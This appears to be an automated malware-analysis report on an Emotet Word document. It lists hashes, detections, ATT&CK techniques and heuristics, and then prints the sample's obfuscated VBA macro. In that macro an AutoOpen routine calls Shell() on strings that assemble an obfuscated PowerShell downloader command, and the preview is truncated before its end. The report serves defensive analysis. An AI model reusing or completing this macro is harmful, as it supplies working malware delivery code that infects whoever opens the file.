Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 d3e83cbfe2cfb722…

MALICIOUS

Office (OLE)

Size: 246.5 KB · Created: 2018-06-29 18:02:00 · Authoring application: Microsoft Office Word · First seen: 2018-07-14
MD5: bf109f9c883eb590ab6c884e49529472 · SHA-1: 63264e53a823a0c8870f65a6e00d8caeb2702710 · SHA-256: d3e83cbfe2cfb722b4b109ac53f7af3d532fc9faf1f4affffd4efaab93cc6968
Risk Score: 242

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 User Execution: Malicious File

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6877384-0', strongly suggesting the Emotet family. Critical heuristics indicate the presence of a VBA macro that utilizes the Shell() function, a common technique for executing arbitrary commands. The AutoOpen macro is present and configured to execute code, likely to download and run a second-stage payload.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-6877384-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6877384-0
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    The VBA source contains a call to Shell()
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    The VBA project contains an AutoOpen procedure, which runs when the document is opened
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15489 bytes
SHA-256: 4c3d365ad4ef49ba16d5b7c34921b94c7f0ef534c8798fc19584ebd0d19cd022

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "SjJPQHzKnhUK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mkzruoFud"
Function RczOMDprk()
On Error Resume Next
EPHQRz = BGsDJA - sQEtPo / (AJoHO + Oct(hiMWi) - 48804 + Log(AktWbC))
mWRKLT = XdEGzV = 74682 / zRKXj + 69175 / ChrW(33302) / MLKjsW + ChrW(dzLGio) * 59074 + ChrB(84219 * CInt(rmPVo) * 15030 - Hex(DPbZHc)) + TCVnEz - Int(msAjb) * (mOHMS - tjzUv)
HOGGjkzSW = pPYzt + Chr(zJkjw + vbKeyP + pPfssjkVW) + "owe" + "rs"
RsidwU = AMftrp - zvbArh / (JVrpmP + Oct(jivvV) - 93574 + Log(MovJZr))
ZAtKwM = hcbDFG = 62070 / FSICq + 13840 / ChrW(34906) / VVkGZI + ChrW(iSMzn) * 99506 + ChrB(30790 * CInt(JCOAGk) * 35813 - Hex(SNvibN)) + LkHFY - Int(NFSYFt) * (sJsEpo - zcGMKD)
AVXDNv = YpzSR - jUQhLD / (BObTYr + Oct(wMfbY) - 21044 + Log(brECoW))
wMKzzC = hiLTV = 15743 / XmnJF + 39919 / ChrW(33751) / kwWsAk + ChrW(jqRps) * 24698 + ChrB(16338 * CInt(snMWBz) * 68687 - Hex(zonoBI)) + TXaNc - Int(bGBSa) * (VBjQvP - vVswP)
RczOMDprk = wMXblzRBj + HOGGjkzSW + ziHhEM + wHYWAWbum + IPzkdsIjn + wVrvzYMWjti
TbQjZO = MHFhtM - rlhUL / (QjlPo + Oct(kbBRqT) - 27119 + Log(CFDIBQ))
ajDOw = jlioju = 77251 / mtEfWW + 16963 / ChrW(22314) / WuGVE + ChrW(MiXhGb) * 65201 + ChrB(46505 * CInt(ZuqKh) * 82397 - Hex(dWvpzA)) + RzMOV - Int(TsafIR) * (JNiHE - wFbjw)
End Function
Sub AutoOpen()
On Error Resume Next
iPOEuW = MCIwSR - QqaJEH / (vXrVHF + Oct(SZARUP) - 21710 + Log(uPoWA))
ECEjou = iNYHVz = 25936 / qBvkdE + 22751 / ChrW(81029) / NfbJl + ChrW(ZSuYLi) * 62644 + ChrB(68062 * CInt(tswnsj) * 96548 - Hex(XPPCN)) + mZsMq - Int(JTisf) * (oaZCIJ - vqlHY)
Application.Run "tXtBE", RczOMDprk
iSvqD = XfUdC - zuXAc / (wEETts + Oct(BYTji) - 48667 + Log(Mpcbqw))
mSajqT = EQbDR = 5938 / sWinRv + 88297 / ChrW(55593) / jwCfO + ChrW(LVhHHJ) * 10152 + ChrB(33477 * CInt(QljNJZ) * 28376 - Hex(MbKYj)) + EEsJK - Int(loomIE) * (VKvam - wWfLj)
End Sub
Function tXtBE(VFDfG)
On Error Resume Next
QjFuWG = JlCmMm - JFBAU / (cbqff + Oct(jFEOU) - 80474 + Log(SPjUqP))
jlZlsH = ashwuh = 28426 / PPYCZC + 60015 / ChrW(8220) / qDJBKS + ChrW(KiNNSf) * 64800 + ChrB(2474 * CInt(iaflnk) * 83902 - Hex(kaMCnY)) + Ehdvow - Int(QakmPU) * (IjhXR - czSIFM)
ZVrzDM = qjXbRz - Jlufp / (Cqpjfz + Oct(DEhECi) - 89066 + Log(dHcIqz))
prXhv = ioStR = 15383 / pCotZO + 1487 / ChrW(48825) / EWhwk + ChrW(mdlKl) * 22077 + ChrB(64929 * CInt(EJjUrr) * 75929 - Hex(zMFnQ)) + nubOjQ - Int(AzwZLC) * (IGWZHR - jpuJhl)
sRhAfKRLaR = zsjCzqS + Shell(doqLiRqY + VFDfG + dzCuYaIPTts, 280621376 - 280621376) + ksbDkEmXw
Ovzihh = SfkDw - JnOFj / (BUSBz + Oct(JTjfIG) - 90624 + Log(pKGRW))
XzzpT = ZEzirn = 81630 / fLRDVl + 72152 / ChrW(4133) / YmDbf + ChrW(SXzwkT) * 81972 + ChrB(65954 * CInt(fJdzha) * 20547 - Hex(DtwwKE)) + OjVhY - Int(QEubj) * (spFOo - bYLHlU)
End Function

Function ziHhEM()
On Error Resume Next
bAdvsf = YamRLh - hvLNo / (NdWHim + Oct(EWViqP) - 22179 + Log(kaDLHS))
niFXR = Riaro = 90946 / GnAWO + 54557 / ChrW(67274) / jrHpH + ChrW(TAVGR) * 738 + ChrB(20516 * CInt(baumc) * 9970 - Hex(rLbQh)) + CpnEk - Int(wDnwh) * (GzhEl - uMoLa)
CdIPikK = "hell" + "  & " + Chr(40) + " " + Chr(40) + "[s" + "TrInG]$ve" + "rBOsEPre" + "FeRe" + "Nce" + Chr(41) + "[" + "1,3]" + Chr(43) + "'" + "x'-j"
JiZvqQ = wdTzQ - XlPhVt / (ibdmZi + Oct(rPpdZ) - 86228 + Log(uwaOB))
jTfWW = pzAaXz = 28510 / dWMFEb + 5683 / ChrW(10221) / bvWZz + ChrW(HCjJE) * 88796 + ChrB(4219 * CInt(MPrOWU) * 14597 - Hex(RwiGE)) + FCqFdP - Int(aAKsd) * (YqoJEb - ApNNjk)
rjWvVBjdsR = "oiN''" + Chr(41) + Chr(40) + "[" + "STrINg]::" + "join" + Chr(40) + " '" + "'," + Chr(40) + " " + "[cHAr[]" + "]" + Chr(40) + "12" + "7,30,40," + " 2 , 10" + "2 , 53" + " , 62 ,"
XRzriE = nMPtAY - YwKodr / (RvBDv + Oct(fazuC) - 56207 + Log(RpFEu))
ccNUK = pWPajr = 74999 / NhBmV + 23988 / ChrW(11449) / joqZX + ChrW(cooST) * 60673 + ChrB(99178 * CInt(OIclo) * 77636 - Hex(pJlmjG)) + vntpH - Int(vZikQ) * 
... (truncated)